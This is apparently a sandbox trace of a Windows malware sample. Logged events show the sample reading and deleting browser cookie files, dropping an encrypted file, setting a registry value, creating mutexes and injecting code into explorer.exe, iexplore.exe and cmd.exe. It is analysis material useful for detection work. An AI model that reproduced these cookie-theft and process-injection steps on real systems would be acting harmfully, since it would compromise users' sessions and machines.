File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Offset: none Length: 113 Value: 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 2633959577
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633961611
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633965583
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Offset: none Length: 205 Value: 55 49 44 0A 39 35 64 64 64 30 65 2D 36 39 2E 32 32 2E 31 33 38 2E 31 33 39 2D 31 33 32 32 37 37 33 32 36 34 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 36 38 31 39 35 36 33 35 32 0A 33 30 33 33 36 35 36 33 0A 32 35 30 35 36 34 33 35 38 success or wait 2633966010
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633969283
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633971753
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt Offset: none Length: 96 Value: 70 69 64 0A 76 31 25 33 41 31 33 32 32 37 37 32 31 33 31 39 31 39 32 36 31 38 33 32 34 34 30 0A 74 77 69 74 74 65 72 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 35 35 38 36 33 36 38 30 0A 33 30 33 33 38 36 37 30 0A 33 30 31 34 32 33 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 2633972178
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633974055
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633976822
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Offset: none Length: 90 Value: 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633977247
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633979132
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633981624
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Offset: none Length: 111 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 2633982056
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633983859
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633987005
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Offset: none Length: 117 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 2633987374
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633990410
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633992900
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt Offset: none Length: 229 Value: 65 78 70 61 63 0A 33 36 30 49 49 33 62 33 39 5F 31 31 30 32 3A 54 31 7E 34 30 49 49 33 61 33 39 5F 30 38 30 33 3A 57 50 31 30 5F 32 7C 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 32 30 34 36 36 35 39 38 34 0A 33 30 31 39 32 33 32 31 0A 32 31 32 32 33 32 37 33 36 30 0A 33 30 31 39 31 success or wait 2633993436
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633995561
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633998333
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt Offset: none Length: 211 Value: 63 62 63 0A 53 57 50 32 32 3A 62 61 6E 3A 31 33 32 35 33 36 34 2C 73 75 62 69 6E 74 3A 31 3A 31 33 32 32 38 35 38 34 38 2C 64 69 73 70 63 6F 75 6E 74 3A 31 3A 31 33 32 33 31 31 37 36 38 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 32 32 35 32 36 35 38 36 38 38 0A 33 30 33 33 38 35 37 32 success or wait 2633998765
Mutant created Name: \BaseNamedObjects\Global\{642AE024-5E58-D5CF-FB56-FD56EA1DDE44} success or wait 2634006892
Privilege adjusted Privilege: Security On or off: on success or wait 2634021321
File created Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2634027121
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2634029254
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2634040321
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2634044266
Section loaded Path: \KnownDlls\rsaenh.dll Access: write and read and execute Type: unknown Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid object name not found 2635235713
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and write and read and execute Type: image Baseaddress: 68000000 Size: 221184 Protection: read write Mapped to pid: own pid success or wait 2635242136
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2635295427
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635857737
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635858142
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635858419
File write Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Offset: none Length: 5 Value: EE BB DE 55 00 success or wait 2635858692
File write Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Offset: none Length: 4099 Value: 6F DD 26 BE 4C C1 4E 3F BE 2B 91 B4 8E 98 0F 2F E4 BB FE 5C 48 7B EA 9A 49 C9 0D 0B 21 4A 05 9D 73 2A A0 0A 6C D4 79 CD 75 A8 18 18 09 41 E5 AA AA 1F 1D 75 D6 51 CB 6A CB AC C2 C5 D1 1B 24 73 8C B2 0A 1D 43 F7 9C 9B 67 44 8D D5 59 3E 1C A1 79 19 A0 B9 29 C0 7C FA 8A 60 C3 8F BC DE B6 20 7A 39 6B 47 success or wait 2635864948
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635945891
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 2635955252
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 2635957151
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt success or wait 2635960976
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt success or wait 2635998857
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 2636002749
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 2636004695
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 2636007054
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 2636008970
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 2636011311
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 2636013217
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 2636016481
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 2636018395
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 2636020676
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 2636022704
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt success or wait 2636024976
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt success or wait 2636026881
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 2636029153
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 2636032261
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt success or wait 2636034651
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt success or wait 2636036747
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt success or wait 2636039281
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt success or wait 2636041185
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt success or wait 2636043466
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt success or wait 2636045373
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt success or wait 2636047727
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt success or wait 2636049638
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 2636051914
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 2636053821
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Dword Data: -1521036859 success or wait 2636204500
System info queried Type: ProcessInformation success or wait 2650824955
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2650832182
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2650834673
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2650835712
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2650836648
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2650837551
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2650838453
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2650839354
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2650840315
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2650841265
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2650842192
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2650843141
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2650844074
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2650845414
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2650846429
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2650847356
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 2650848307
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 2650849149
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2650849986
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2650850910
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} success or wait 2650852279
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8000000 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write success or wait 2650853088
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8000000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2650876794
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 80301F0 Length: 4 Value: 00 00 00 00 success or wait 2650895173
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8030204 Length: 4 Value: 00 00 00 08 success or wait 2650910013
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 80306C8 Length: 4 Value: B8 03 00 00 success or wait 2650924267
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 80306CC Length: 4 Value: B8 0A 00 00 success or wait 2650938110
System info queried Type: ProcessInformation success or wait 2650939920
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2650946933
Thread created PID: 1712 TID: 1956 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: true success or wait 2651100515
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 2666940405
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} success or wait 2666943457
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E70000 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write success or wait 2666943987
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E70000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2666984746
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA01F0 Length: 4 Value: 00 00 00 00 success or wait 2667050522
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA0204 Length: 4 Value: 00 00 E7 02 success or wait 2667145785
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA06C8 Length: 4 Value: 54 0F 00 00 success or wait 2667191007
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA06CC Length: 4 Value: 3C 0F 00 00 success or wait 2667376259
System info queried Type: ProcessInformation success or wait 2667506927
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2668292295
Thread created PID: 580 TID: 2552 EIP: 7C8106F9 Imagepath: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Injected: true success or wait 2786559593
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 2af72gde object name not found 2786680710
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 2f6gb30c object name not found 2786687791
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: 2feg2i1d object name not found 2786797150
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-CD5C-B06DDC17937F} success or wait 2787382969
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 0 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write process is terminating 2787391468
System info queried Type: ProcessInformation success or wait 2787391864
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2787394419
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2787419662
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2787473593
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2787473990
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2787474444
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2787474779
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2787475110
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2787475490
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2787475838
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2787476191
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2787476553
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: 186gef90 object name not found 2787502848
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2787503382
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2787503882
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2787504305
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2787504689
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 2787505039
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 2787505359
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2787505664
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2787506029
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 2787506736
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D55-B06D5C1E937F} success or wait 2787507190
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 150000 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write success or wait 2787507380
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 150000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2787630526
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: write and read and execute Type: commit Baseaddress: 2900000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2787636472
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: write and read and execute Type: commit Baseaddress: 2900000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2787647593
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2787661574
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 1801F0 Length: 4 Value: 00 00 00 00 success or wait 2787719533
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 180204 Length: 4 Value: 00 00 15 00 success or wait 2787750914
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 1806C8 Length: 4 Value: 10 00 00 00 success or wait 2817820927
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 1806CC Length: 4 Value: 24 00 00 00 success or wait 2818038131
System info queried Type: ProcessInformation success or wait 2818045238
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2818052059
Thread created PID: 2152 TID: 2676 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\cmd.exe Injected: true success or wait 2818545026
System info queried Type: ProcessInformation success or wait 2819618782
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2819655991
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2940000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2819689263
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2940000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2819719903
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2819736274
